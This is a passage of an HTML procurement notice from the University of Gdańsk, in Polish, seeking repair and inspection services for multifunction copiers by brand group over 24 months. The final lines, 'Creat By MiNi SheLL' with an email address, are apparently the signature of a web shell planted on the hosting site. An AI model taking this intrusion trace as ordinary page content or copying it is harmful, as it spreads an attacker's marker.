Zakres usługi obejmuje: przeglądy techniczne i naprawy wielofunkcyjnych urządzeń drukująco-kopiujących wraz  z  wymianą niesprawnych części zamiennych i  materiałów  eksploatacyjnych  ( z  wyłączeniem  papieru  i tonerów  nie  wchodzących w  zakres  niniejszego przedmiotu zamówienia )  , za cenę  zaoferowaną  przez Wykonawcę w formularzu ofertowym  - załącznik nr 1  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena brutto roboczogodziny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie  usług przeglądów technicznych oraz  bieżących  napraw wielofunkcyjnych  urządzeń drukująco-kopiujących nieobjętych gwarancją, będących na  wyposażeniu Uniwersytetu  Gdańskiego wg części:części II:  Ricoh, Nashuatec, Lanier, Rex  Rotary, Gestetner, Infotec, Xerox, Dsm, Samsung, Toshiba;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług polegających na wykonywaniu przeglądów technicznych 
i bieżących napraw wielofunkcyjnych urządzeń drukująco - kopiujących, nieobjętych gwarancją, będących na wyposażeniu jednostek organizacyjnych Uniwersytetu Gdańskiego, zwanych  dalej usługą.
4.	Zakres usługi obejmuje: przeglądy techniczne i naprawy wielofunkcyjnych urządzeń drukująco-kopiujących 
wraz  z  wymianą niesprawnych części zamiennych i  materiałów  eksploatacyjnych  ( z  wyłączeniem  papieru  i tonerów  nie  wchodzących w  zakres  niniejszego przedmiotu zamówienia )  , za cenę  zaoferowaną  przez Wykonawcę w formularzu ofertowym  - załącznik nr 1  do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena brutto roboczogodziny - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie  usług przeglądów technicznych oraz  bieżących  napraw wielofunkcyjnych  urządzeń drukująco-kopiujących nieobjętych gwarancją, będących na  wyposażeniu Uniwersytetu  Gdańskiego wg części:części  III: Mita, Kyocera..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług polegających na wykonywaniu przeglądów technicznych 
i bieżących napraw wielofunkcyjnych urządzeń drukująco - kopiujących, nieobjętych gwarancją, będących na wyposażeniu jednostek organizacyjnych Uniwersytetu Gdańskiego, zwanych  dalej usługą.
Zakres usługi obejmuje: przeglądy techniczne i naprawy wielofunkcyjnych urządzeń drukująco-kopiujących wraz  z  wymianą niesprawnych części zamiennych i  materiałów  eksploatacyjnych  ( z  wyłączeniem  papieru  i tonerów  nie  wchodzących w  zakres  niniejszego przedmiotu zamówienia )  , za cenę  zaoferowaną  przez Wykonawcę w formularzu ofertowym  - załącznik nr 1  do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.31.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. cena brutto roboczogodziny - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com